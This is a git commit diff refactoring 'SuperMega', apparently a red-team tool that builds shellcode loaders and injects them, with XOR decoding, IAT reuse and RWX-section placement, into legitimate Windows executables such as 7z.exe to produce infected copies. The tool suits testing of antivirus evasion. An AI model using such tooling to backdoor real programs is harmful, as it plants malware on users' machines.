refactor: project -> settings and model/

This commit is contained in:
Dobin
2024-02-25 08:47:25 +00:00
parent b1dd3481ed
commit d61f358ae4
18 changed files with 185 additions and 157 deletions
+2
View File
@@ -104,6 +104,8 @@ your own shellcode loader.
### Environment Variables ### Environment Variables
$Env:PATH += ";C:\Tools\radare2-5.8.8-w64\bin"
Use Use
``` ```
"C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat" "C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Auxiliary\Build\vcvars64.bat"
+1 -1
View File
@@ -5,7 +5,7 @@ import glob
import logging import logging
from config import config from config import config
from defs import * from model.defs import *
logger = logging.getLogger("Helper") logger = logging.getLogger("Helper")
View File
+10 -20
View File
@@ -2,9 +2,11 @@ from typing import Dict
import logging import logging
import pefile import pefile
from model.defs import *
import pehelper import pehelper
from peparser.misc import get_physical_address
logger = logging.getLogger("Model") logger = logging.getLogger("ExeHost")
class IatResolve(): class IatResolve():
@@ -21,21 +23,9 @@ class IatResolve():
self.id self.id
) )
def get_physical_address(pe, virtual_address): class ExeHost():
# Iterate through the section headers to find which section contains the VA def __init__(self, filepath: FilePath):
for section in pe.sections: self.filepath: FilePath = filepath
# Check if the VA is within the range of this section
if section.VirtualAddress <= virtual_address < section.VirtualAddress + section.Misc_VirtualSize:
# Calculate the difference between the VA and the section's virtual address
virtual_offset = virtual_address - section.VirtualAddress
# Add the difference to the section's pointer to raw data
return virtual_offset
#physical_address = section.PointerToRawData + virtual_offset
#return physical_address
return None
class ExeInfo():
def __init__(self):
self.iat_resolves: Dict[str, IatResolve] = {} self.iat_resolves: Dict[str, IatResolve] = {}
self.image_base = 0 self.image_base = 0
self.dynamic_base = False self.dynamic_base = False
@@ -57,12 +47,12 @@ class ExeInfo():
func_name, placeholder, pehelper.get_addr_for(self.iat, func_name)) func_name, placeholder, pehelper.get_addr_for(self.iat, func_name))
def parse_from_exe(self, filepath): def init(self):
logger.info("--[ Analyzing: {}".format(filepath)) logger.info("--[ Analyzing: {}".format(self.filepath))
pe = pefile.PE(filepath) pe = pefile.PE(self.filepath)
if pe.FILE_HEADER.Machine != 0x8664: if pe.FILE_HEADER.Machine != 0x8664:
raise Exception("Binary is not 64bit: {}".format(filepath)) raise Exception("Binary is not 64bit: {}".format(self.filepath))
self.ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint self.ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
self.ep_raw = get_physical_address(pe, self.ep) self.ep_raw = get_physical_address(pe, self.ep)
+20
View File
@@ -0,0 +1,20 @@
import logging
from model import *
from model.defs import *
logger = logging.getLogger("Payload")
class Payload():
def __init__(self, filepath: FilePath):
self.payload_path: FilePath = filepath
self.payload_data: bytes = b""
self.len: int = 0
def init(self):
logging.info("--( Load payload: {}".format(self.payload_path))
with open(self.payload_path, 'rb') as f:
self.payload_data = f.read()
self.len = len(self.payload_data)
+21
View File
@@ -0,0 +1,21 @@
import logging
from model import *
from model.defs import *
from model.payload import Payload
from model.exehost import ExeHost
logger = logging.getLogger("Project")
class Project():
def __init__(self, settings):
self.settings = settings
self.payload = Payload(self.settings.payload_path)
self.exe_host = ExeHost(self.settings.inject_exe_in)
def init(self):
self.payload.init()
self.exe_host.init()
+4 -22
View File
@@ -1,13 +1,11 @@
from model import * from model import *
from defs import * from model.defs import *
class Settings():
class Project():
def __init__(self): def __init__(self):
# User, generating normally
self.payload_path: FilePath = "" self.payload_path: FilePath = ""
self.payload_data: bytes = b""
# Settings
self.source_style: SourceStyle = SourceStyle.peb_walk self.source_style: SourceStyle = SourceStyle.peb_walk
self.alloc_style: AllocStyle = AllocStyle.RWX self.alloc_style: AllocStyle = AllocStyle.RWX
self.exec_style: ExecStyle = ExecStyle.CALL self.exec_style: ExecStyle = ExecStyle.CALL
@@ -20,31 +18,15 @@ class Project():
self.inject_mode: int = 2 self.inject_mode: int = 2
self.inject_exe_in: FilePath = "" self.inject_exe_in: FilePath = ""
self.inject_exe_out: FilePath = "" self.inject_exe_out: FilePath = ""
self.exe_info: ExeInfo = None
# debug # Debug
self.show_command_output = False self.show_command_output = False
self.verify: bool = False self.verify: bool = False
self.try_start_loader_shellcode: bool = False self.try_start_loader_shellcode: bool = False
self.try_start_final_shellcode: bool = False self.try_start_final_shellcode: bool = False
self.try_start_final_infected_exe: bool = False self.try_start_final_infected_exe: bool = False
self.cleanup_files_on_start: bool = True self.cleanup_files_on_start: bool = True
self.cleanup_files_on_exit: bool = True self.cleanup_files_on_exit: bool = True
self.generate_asm_from_c: bool = True self.generate_asm_from_c: bool = True
self.generate_shc_from_asm: bool = True self.generate_shc_from_asm: bool = True
def load_payload(self):
logging.info("--( Load payload: {}".format(self.payload_path))
with open(self.payload_path, 'rb') as input2:
self.payload_data = input2.read()
def load_injectable(self):
logging.info("--( Load injectable: {}".format(self.inject_exe_in))
self.exe_info = ExeInfo()
self.exe_info.parse_from_exe(self.inject_exe_in)
+1 -1
View File
@@ -5,7 +5,7 @@ from keystone import Ks, KS_ARCH_X86, KS_MODE_64
from capstone import Cs, CS_ARCH_X86, CS_MODE_64 from capstone import Cs, CS_ARCH_X86, CS_MODE_64
import logging import logging
from defs import * from model.defs import *
logger = logging.getLogger("PEHelper") logger = logging.getLogger("PEHelper")
+14
View File
@@ -0,0 +1,14 @@
def get_physical_address(pe, virtual_address):
# Iterate through the section headers to find which section contains the VA
for section in pe.sections:
# Check if the VA is within the range of this section
if section.VirtualAddress <= virtual_address < section.VirtualAddress + section.Misc_VirtualSize:
# Calculate the difference between the VA and the section's virtual address
virtual_offset = virtual_address - section.VirtualAddress
# Add the difference to the section's pointer to raw data
return virtual_offset
#physical_address = section.PointerToRawData + virtual_offset
#return physical_address
return None
+1 -1
View File
@@ -17,7 +17,7 @@ def asm_to_shellcode(asm_in: FilePath, build_exe: FilePath, shellcode_out: FileP
asm_in, asm_in,
"/link", "/link",
"/OUT:{}".format(build_exe), "/OUT:{}".format(build_exe),
"/entry:AlignRSP" "/entry:AlignRSP" # "/entry:main",
]) ])
if not os.path.isfile(build_exe): if not os.path.isfile(build_exe):
raise Exception("Compiling failed") raise Exception("Compiling failed")
+2 -2
View File
@@ -166,7 +166,7 @@ def get_function_stubs(asm_in: FilePath):
return functions return functions
def fixup_iat_reuse(filename: FilePath, exe_info): def fixup_iat_reuse(filename: FilePath, exe_host):
with open(filename, 'r', encoding='utf-8') as asmfile: with open(filename, 'r', encoding='utf-8') as asmfile:
lines = asmfile.readlines() lines = asmfile.readlines()
@@ -180,7 +180,7 @@ def fixup_iat_reuse(filename: FilePath, exe_info):
randbytes: bytes = os.urandom(6) randbytes: bytes = os.urandom(6)
lines[idx] = bytes_to_asm_db(randbytes) + " ; IAT Reuse for {}".format(func_name) lines[idx] = bytes_to_asm_db(randbytes) + " ; IAT Reuse for {}".format(func_name)
lines[idx] += "\n" lines[idx] += "\n"
exe_info.add_iat_resolve(func_name, randbytes) exe_host.add_iat_resolve(func_name, randbytes)
logger.info(" > Replace func name: {} with {}".format( logger.info(" > Replace func name: {} with {}".format(
func_name, randbytes.hex())) func_name, randbytes.hex()))
+9 -8
View File
@@ -4,9 +4,10 @@ import pprint
import logging import logging
import time import time
import tempfile import tempfile
import logging
from pehelper import * from pehelper import *
from model import * from model.exehost import *
from observer import observer from observer import observer
from helper import rbrunmode_str from helper import rbrunmode_str
from derbackdoorer.derbackdoorer import PeBackdoor from derbackdoorer.derbackdoorer import PeBackdoor
@@ -56,17 +57,17 @@ def inject_exe(
raise Exception("Shellcode injection error") raise Exception("Shellcode injection error")
def injected_fix_iat(exe_out: FilePath, exe_info: ExeInfo): def injected_fix_iat(exe_out: FilePath, exe_host: ExeHost):
"""replace IAT in shellcode in code and re-implant it""" """replace IAT in shellcode in code and re-implant it"""
# get code section of exe_out # get code section of exe_out
code = extract_code_from_exe(exe_out) code = extract_code_from_exe(exe_out)
for cap in exe_info.get_all_iat_resolvs().values(): for cap in exe_host.get_all_iat_resolvs().values():
if not cap.id in code: if not cap.id in code:
raise Exception("IatResolve ID {} not found, abort".format(cap.id)) raise Exception("IatResolve ID {} not found, abort".format(cap.id))
off = code.index(cap.id) off = code.index(cap.id)
current_address = off + exe_info.image_base + exe_info.code_virtaddr current_address = off + exe_host.image_base + exe_host.code_virtaddr
#current_address += 2 #current_address += 2
destination_address = cap.addr destination_address = cap.addr
logger.info(" Replace at 0x{:x} with call to 0x{:x}".format( logger.info(" Replace at 0x{:x} with call to 0x{:x}".format(
@@ -81,7 +82,7 @@ def injected_fix_iat(exe_out: FilePath, exe_info: ExeInfo):
write_code_section(exe_file=exe_out, new_data=code) write_code_section(exe_file=exe_out, new_data=code)
def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info): def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_host):
data_reuser = DataReuser(exe_path) data_reuser = DataReuser(exe_path)
data_reuser.init() data_reuser.init()
#ret = data_reuser.get_reloc_largest_gap(".rdata") #ret = data_reuser.get_reloc_largest_gap(".rdata")
@@ -111,8 +112,8 @@ def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info):
f.seek(addr) f.seek(addr)
f.write(var_data) f.write(var_data)
#f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAA") #f.write(b"AAAAAAAAAAAAAAAAAAAAAAAAAAA")
print("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_info.image_base)) print("ADD: 0x{:X} 0x{:X} 0x{:X}".format(addr, sect.virt_addr, exe_host.image_base))
fixup["addr"] = addr + sect.virt_addr + exe_info.image_base - sect.raw_addr fixup["addr"] = addr + sect.virt_addr + exe_host.image_base - sect.raw_addr
addr += len(var_data) + 8 addr += len(var_data) + 8
#data_reuser.pe.write(exe_path + ".tmp") #data_reuser.pe.write(exe_path + ".tmp")
#data_reuser.pe.close() #data_reuser.pe.close()
@@ -125,7 +126,7 @@ def injected_fix_data(exe_path, data_fixups, data_fixup_entries, exe_info):
raise Exception("DataResuse: ID {} not found, abort".format(fixup["randbytes"])) raise Exception("DataResuse: ID {} not found, abort".format(fixup["randbytes"]))
off = code.index(fixup["randbytes"]) off = code.index(fixup["randbytes"])
current_address = off + exe_info.image_base + exe_info.code_virtaddr current_address = off + exe_host.image_base + exe_host.code_virtaddr
destination_address = fixup["addr"] destination_address = fixup["addr"]
logger.info(" Replace at 0x{:x} with call to 0x{:x}".format( logger.info(" Replace at 0x{:x} with call to 0x{:x}".format(
current_address, destination_address current_address, destination_address
+1 -1
View File
@@ -5,7 +5,7 @@ import logging
from helper import * from helper import *
from observer import observer from observer import observer
from defs import * from model.defs import *
use_templates = True use_templates = True
logger = logging.getLogger("Assembler") logger = logging.getLogger("Assembler")
+1 -1
View File
@@ -1,7 +1,7 @@
import r2pipe import r2pipe
import os import os
from defs import * from model.defs import *
from helper import hexdump from helper import hexdump
def r2_disas(data: bytes): def r2_disas(data: bytes):
+86 -83
View File
@@ -5,8 +5,9 @@ from typing import Dict
import os import os
import logging import logging
import time import time
import pefile
from defs import * from model.defs import *
from model import * from model import *
from helper import * from helper import *
from config import config from config import config
@@ -15,16 +16,18 @@ import phases.compiler
import phases.assembler import phases.assembler
import phases.injector import phases.injector
from observer import observer from observer import observer
from project import Project
from pehelper import extract_code_from_exe from pehelper import extract_code_from_exe
from model.project import Project
from model.settings import Settings
log_messages = [] log_messages = []
def main(): def main():
logger.info("Super Mega") logger.info("Super Mega")
config.load() config.load()
project = Project() settings = Settings()
parser = argparse.ArgumentParser(description='SuperMega shellcode loader') parser = argparse.ArgumentParser(description='SuperMega shellcode loader')
parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode') parser.add_argument('--shellcode', type=str, help='The path to the file of your payload shellcode')
@@ -47,57 +50,57 @@ def main():
config.ShowCommandOutput = True config.ShowCommandOutput = True
if args.verify: if args.verify:
project.payload_path = "shellcodes/createfile.bin" settings.payload_path = "shellcodes/createfile.bin"
project.verify = True settings.verify = True
project.try_start_final_infected_exe = False settings.try_start_final_infected_exe = False
project.try_start_final_shellcode = False settings.try_start_final_shellcode = False
if args.verify == "peb": if args.verify == "peb":
project.inject = True settings.inject = True
project.inject_mode = 2 settings.inject_mode = 2
project.inject_exe_in = "exes/7z.exe" settings.inject_exe_in = "exes/7z.exe"
project.inject_exe_out = "out/7z-verify.exe" settings.inject_exe_out = "out/7z-verify.exe"
elif args.verify == "iat": elif args.verify == "iat":
project.inject = True settings.inject = True
project.inject_mode = 1 # 2 settings.inject_mode = 1 # 2
project.inject_exe_in = "exes/procexp64.exe" settings.inject_exe_in = "exes/procexp64.exe"
project.inject_exe_out = "out/procexp64-verify.exe" settings.inject_exe_out = "out/procexp64-verify.exe"
elif args.verify == "rwx": elif args.verify == "rwx":
project.inject = True settings.inject = True
project.inject_mode = 1 # ,2 is broken atm settings.inject_mode = 1 # ,2 is broken atm
project.inject_exe_in = "exes/wifiinfoview.exe" settings.inject_exe_in = "exes/wifiinfoview.exe"
project.inject_exe_out = "out/wifiinfoview.exe-verify.exe" settings.inject_exe_out = "out/wifiinfoview.exe-verify.exe"
else: else:
logger.info("Unknown verify option {}, use std/iat".format(args.verify)) logger.info("Unknown verify option {}, use std/iat".format(args.verify))
return return
else: else:
project.try_start_final_infected_exe = args.start_injected settings.try_start_final_infected_exe = args.start_injected
project.try_start_final_shellcode = args.start_final_shellcode settings.try_start_final_shellcode = args.start_final_shellcode
project.try_start_loader_shellcode = args.start_loader_shellcode settings.try_start_loader_shellcode = args.start_loader_shellcode
project.cleanup_files_on_start = not args.no_clean_at_start settings.cleanup_files_on_start = not args.no_clean_at_start
project.cleanup_files_on_exit =not args.no_clean_at_exit settings.cleanup_files_on_exit =not args.no_clean_at_exit
if args.short_call_patching: if args.short_call_patching:
project.short_call_patching = True settings.short_call_patching = True
if args.alloc: if args.alloc:
if args.alloc == "rwx_1": if args.alloc == "rwx_1":
project.alloc_style = AllocStyle.RWX settings.alloc_style = AllocStyle.RWX
if args.decoder: if args.decoder:
if args.decoder == "plain_1": if args.decoder == "plain_1":
project.decoder_style = DecoderStyle.PLAIN_1 settings.decoder_style = DecoderStyle.PLAIN_1
elif args.decoder == "xor_1": elif args.decoder == "xor_1":
project.decoder_style = DecoderStyle.XOR_1 settings.decoder_style = DecoderStyle.XOR_1
if args.exec: if args.exec:
if args.exec == "direct_1": if args.exec == "direct_1":
project.exec_style = ExecStyle.CALL settings.exec_style = ExecStyle.CALL
if args.rbrunmode: if args.rbrunmode:
if args.rbrunmode == "1" or args.rbrunmode == "2": if args.rbrunmode == "1" or args.rbrunmode == "2":
project.inject_mode = int(args.rbrunmode) settings.inject_mode = int(args.rbrunmode)
else: else:
logging.error("Invalid mode, use one of:") logging.error("Invalid mode, use one of:")
for i in ["1", "2"]: for i in ["1", "2"]:
@@ -113,16 +116,16 @@ def main():
if not os.path.isfile(args.shellcode): if not os.path.isfile(args.shellcode):
logger.info("Could not find: {}".format(args.shellcode)) logger.info("Could not find: {}".format(args.shellcode))
return return
project.payload_path = args.shellcode settings.payload_path = args.shellcode
if args.inject: if args.inject:
if not os.path.isfile(args.inject): if not os.path.isfile(args.inject):
logger.info("Could not find: {}".format(args.inject)) logger.info("Could not find: {}".format(args.inject))
return return
project.inject = True settings.inject = True
project.inject_exe_in = args.inject settings.inject_exe_in = args.inject
project.inject_exe_out = args.inject.replace(".exe", ".infected.exe") settings.inject_exe_out = args.inject.replace(".exe", ".infected.exe")
start(project) start(settings)
def get_physical_address(pe, virtual_address): def get_physical_address(pe, virtual_address):
# Iterate through the section headers to find which section contains the VA # Iterate through the section headers to find which section contains the VA
@@ -137,88 +140,88 @@ def get_physical_address(pe, virtual_address):
#return physical_address #return physical_address
return None return None
def start(project: Project): def start(settings: Settings):
# Delete: all old files # Delete: all old files
if project.cleanup_files_on_start: if settings.cleanup_files_on_start:
clean_files() clean_files()
delete_all_files_in_directory("logs/") delete_all_files_in_directory("logs/")
# Load our input # Load our input
project.load_payload() project = Project(settings)
project.load_injectable() project.init()
# Copy: IAT_REUSE loader C files into working directory: build/ # Copy: IAT_REUSE loader C files into working directory: build/
phases.templater.create_c_from_template( phases.templater.create_c_from_template(
source_style = SourceStyle.iat_reuse, source_style = SourceStyle.iat_reuse,
alloc_style = project.alloc_style, alloc_style = settings.alloc_style,
exec_style = project.exec_style, exec_style = settings.exec_style,
decoder_style= project.decoder_style, decoder_style= settings.decoder_style,
payload_len = len(project.payload_data), payload_len = project.payload.len,
) )
# Compile: IAT_REUSE loader C -> ASM # Compile: IAT_REUSE loader C -> ASM
if project.generate_asm_from_c: if settings.generate_asm_from_c:
phases.compiler.compile( phases.compiler.compile(
c_in = main_c_file, c_in = main_c_file,
asm_out = main_asm_file, asm_out = main_asm_file,
payload_len = len(project.payload_data), payload_len = project.payload.len,
short_call_patching = project.short_call_patching) short_call_patching = project.settings.short_call_patching)
# Decide if we can use IAT_REUSE (all function calls available as import) # Decide if we can use IAT_REUSE (all function calls available as import)
required_functions = phases.compiler.get_function_stubs(main_asm_file) required_functions = phases.compiler.get_function_stubs(main_asm_file)
if project.exe_info.has_all_functions(required_functions): if project.exe_host.has_all_functions(required_functions):
project.source_style = SourceStyle.iat_reuse settings.source_style = SourceStyle.iat_reuse
logger.warning("--[ SourceStyle: Using IAT_REUSE".format()) logger.warning("--[ SourceStyle: Using IAT_REUSE".format())
# all good, patch ASM # all good, patch ASM
phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_info) phases.compiler.fixup_iat_reuse(main_asm_file, project.exe_host)
observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file)) observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file))
else: else:
# Not good, Fall back to PEB_WALK # Not good, Fall back to PEB_WALK
project.source_style = SourceStyle.peb_walk settings.source_style = SourceStyle.peb_walk
logger.warning("--[ SourceStyle: Fall back to PEB_WALK".format()) logger.warning("--[ SourceStyle: Fall back to PEB_WALK".format())
observer.clean_files() observer.clean_files()
clean_files() clean_files()
# Copy: PEB_WALK loader C files into working directory: build/ # Copy: PEB_WALK loader C files into working directory: build/
phases.templater.create_c_from_template( phases.templater.create_c_from_template(
source_style = SourceStyle.peb_walk, source_style = SourceStyle.peb_walk,
alloc_style = project.alloc_style, alloc_style = settings.alloc_style,
exec_style = project.exec_style, exec_style = settings.exec_style,
decoder_style= project.decoder_style, decoder_style= settings.decoder_style,
payload_len = len(project.payload_data), payload_len = project.payload.len,
) )
# Compile: PEB_WALK C -> ASM # Compile: PEB_WALK C -> ASM
if project.generate_asm_from_c: if settings.generate_asm_from_c:
phases.compiler.compile( phases.compiler.compile(
c_in = main_c_file, c_in = main_c_file,
asm_out = main_asm_file, asm_out = main_asm_file,
payload_len = len(project.payload_data)) payload_len = project.payload.len)
observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file)) observer.add_text("carrier_asm_updated", file_readall_text(main_asm_file))
# Assemble: ASM -> Shellcode # Assemble: ASM -> Shellcode
if project.generate_shc_from_asm: if settings.generate_shc_from_asm:
phases.assembler.asm_to_shellcode( phases.assembler.asm_to_shellcode(
asm_in = main_asm_file, asm_in = main_asm_file,
build_exe = main_exe_file, build_exe = main_exe_file,
shellcode_out = main_shc_file) shellcode_out = main_shc_file)
# Try: Starting the loader-shellcode (rarely useful) # Try: Starting the loader-shellcode (rarely useful)
if project.try_start_loader_shellcode: if settings.try_start_loader_shellcode:
try_start_shellcode(main_shc_file) try_start_shellcode(main_shc_file)
# Merge: shellcode/loader with payload # Merge: shellcode/loader with payload
if project.dataref_style == DataRefStyle.APPEND: if settings.dataref_style == DataRefStyle.APPEND:
phases.assembler.merge_loader_payload( phases.assembler.merge_loader_payload(
shellcode_in = main_shc_file, shellcode_in = main_shc_file,
shellcode_out = main_shc_file, shellcode_out = main_shc_file,
payload_data = project.payload_data, payload_data = project.payload.payload_data,
decoder_style = project.decoder_style) decoder_style = settings.decoder_style)
if project.verify and project.source_style == SourceStyle.peb_walk: if settings.verify and settings.source_style == SourceStyle.peb_walk:
logger.info("--[ Verify final shellcode") logger.info("--[ Verify final shellcode")
if not verify_shellcode(main_shc_file): if not verify_shellcode(main_shc_file):
logger.info("Could not verify, still continuing") logger.info("Could not verify, still continuing")
#return #return
if project.try_start_final_shellcode: if settings.try_start_final_shellcode:
logger.info("--[ Test Append shellcode") logger.info("--[ Test Append shellcode")
try_start_shellcode(main_shc_file) try_start_shellcode(main_shc_file)
@@ -226,9 +229,9 @@ def start(project: Project):
shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file))) shutil.copyfile(main_shc_file, os.path.join("out/", os.path.basename(main_shc_file)))
# RWX Injection # RWX Injection
if project.exe_info.rwx_section != None: if project.exe_host.rwx_section != None:
logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format( logger.info("--[ RWX section {} found. Will obfuscate loader+payload and inject into it".format(
project.exe_info.rwx_section.Name.decode().rstrip('\x00') project.exe_host.rwx_section.Name.decode().rstrip('\x00')
)) ))
obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn") obfuscate_shc_loader(main_shc_file, main_shc_file + ".sgn")
observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn")) observer.add_code("payload_sgn", file_readall_binary(main_shc_file + ".sgn"))
@@ -236,33 +239,33 @@ def start(project: Project):
# inject merged loader into an exe # inject merged loader into an exe
exit_code = 0 exit_code = 0
if project.inject: if settings.inject:
l = len(file_readall_binary(main_shc_file)) l = len(file_readall_binary(main_shc_file))
if l + 128 > project.exe_info.code_size: if l + 128 > project.exe_host.code_size:
logger.error("Error: Shellcode {}+128 too small for target code section {}".format( logger.error("Error: Shellcode {}+128 too small for target code section {}".format(
l, project.exe_info.code_size l, project.exe_host.code_size
)) ))
return return
phases.injector.inject_exe( phases.injector.inject_exe(
shellcode_in = main_shc_file, shellcode_in = main_shc_file,
exe_in = project.inject_exe_in, exe_in = settings.inject_exe_in,
exe_out = project.inject_exe_out, exe_out = settings.inject_exe_out,
inject_mode = project.inject_mode, inject_mode = settings.inject_mode,
) )
if project.source_style == SourceStyle.iat_reuse: if settings.source_style == SourceStyle.iat_reuse:
phases.injector.injected_fix_iat( phases.injector.injected_fix_iat(
project.inject_exe_out, project.exe_info) settings.inject_exe_out, project.exe_host)
# TODO IF? # TODO IF?
phases.injector.injected_fix_data( phases.injector.injected_fix_data(
project.inject_exe_out, settings.inject_exe_out,
config.data_fixups, config.data_fixups,
config.data_fixup_entries, config.data_fixup_entries,
project.exe_info) project.exe_host)
code = extract_code_from_exe(project.inject_exe_out) code = extract_code_from_exe(settings.inject_exe_out)
pe = pefile.PE(project.inject_exe_out) pe = pefile.PE(settings.inject_exe_out)
ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint ep = pe.OPTIONAL_HEADER.AddressOfEntryPoint
ep_raw = get_physical_address(pe, ep) ep_raw = get_physical_address(pe, ep)
pe.close() pe.close()
@@ -273,18 +276,18 @@ def start(project: Project):
code[ep_raw:ep_raw+300]) code[ep_raw:ep_raw+300])
if project.verify: if settings.verify:
logger.info("--[ Verify infected exe") logger.info("--[ Verify infected exe")
exit_code = phases.injector.verify_injected_exe(project.inject_exe_out) exit_code = phases.injector.verify_injected_exe(settings.inject_exe_out)
elif project.try_start_final_infected_exe: elif settings.try_start_final_infected_exe:
logger.info("--[ Start infected exe: {}".format(project.inject_exe_out)) logger.info("--[ Start infected exe: {}".format(settings.inject_exe_out))
run_process_checkret([ run_process_checkret([
project.inject_exe_out, settings.inject_exe_out,
], check=False) ], check=False)
# Cleanup files # Cleanup files
if project.cleanup_files_on_exit: if settings.cleanup_files_on_exit:
clean_files() clean_files()
# write log to file # write log to file
+9 -9
View File
@@ -4,8 +4,8 @@ import unittest
import logging import logging
from phases.compiler import fixup_asm_file, fixup_iat_reuse from phases.compiler import fixup_asm_file, fixup_iat_reuse
from model import ExeInfo from model.exehost import ExeHost
from defs import * from model.defs import *
from observer import observer from observer import observer
@@ -44,15 +44,15 @@ class AsmTest(unittest.TestCase):
path_working: FilePath = "tests/data/iat_reuse_pre_fixup.asm.test" path_working: FilePath = "tests/data/iat_reuse_pre_fixup.asm.test"
shutil.copy(path_in, path_working) shutil.copy(path_in, path_working)
exe_info = ExeInfo() exe_host = ExeHost()
fixup_iat_reuse(path_working, exe_info) fixup_iat_reuse(path_working, exe_host)
self.assertTrue(len(exe_info.iat_resolves), 2) self.assertTrue(len(exe_host.iat_resolves), 2)
self.assertTrue("GetEnvironmentVariableW" in exe_info.iat_resolves) self.assertTrue("GetEnvironmentVariableW" in exe_host.iat_resolves)
self.assertEqual(exe_info.iat_resolves["GetEnvironmentVariableW"].name, "GetEnvironmentVariableW") self.assertEqual(exe_host.iat_resolves["GetEnvironmentVariableW"].name, "GetEnvironmentVariableW")
self.assertEqual(exe_info.iat_resolves["GetEnvironmentVariableW"].addr, 0) self.assertEqual(exe_host.iat_resolves["GetEnvironmentVariableW"].addr, 0)
self.assertTrue(len(exe_info.iat_resolves["GetEnvironmentVariableW"].id), 6) # 6 random bytes self.assertTrue(len(exe_host.iat_resolves["GetEnvironmentVariableW"].id), 6) # 6 random bytes
with open(path_working, "r") as f: with open(path_working, "r") as f:
lines = f.readlines() lines = f.readlines()
+1 -6
View File
@@ -3,11 +3,6 @@ from typing import List
import unittest import unittest
import logging import logging
from model import ExeInfo
from defs import *
from helper import hexdump
from observer import observer
from phases.datareuse import * from phases.datareuse import *
@@ -69,7 +64,7 @@ class DataReuseTest(unittest.TestCase):
fixup = data_fixups[0] fixup = data_fixups[0]
self.assertTrue(fixup["string_ref"], "rcx") self.assertTrue(fixup["string_ref"], "rcx")
self.assertTrue(fixup["register"], "$SG72513") self.assertTrue(fixup["register"], "$SG72513")
self.assertEqual(5, len(fixup["randbytes"])) self.assertEqual(7, len(fixup["randbytes"])) # needs to be 7!
asmFileParser.write_lines_to(asm_out) asmFileParser.write_lines_to(asm_out)
+2 -2
View File
@@ -3,8 +3,8 @@ from typing import List
import unittest import unittest
import logging import logging
from model import ExeInfo from model.exehost import ExeHost
from defs import * from model.defs import *
from pehelper import extract_code_from_exe from pehelper import extract_code_from_exe
from helper import hexdump from helper import hexdump
from observer import observer from observer import observer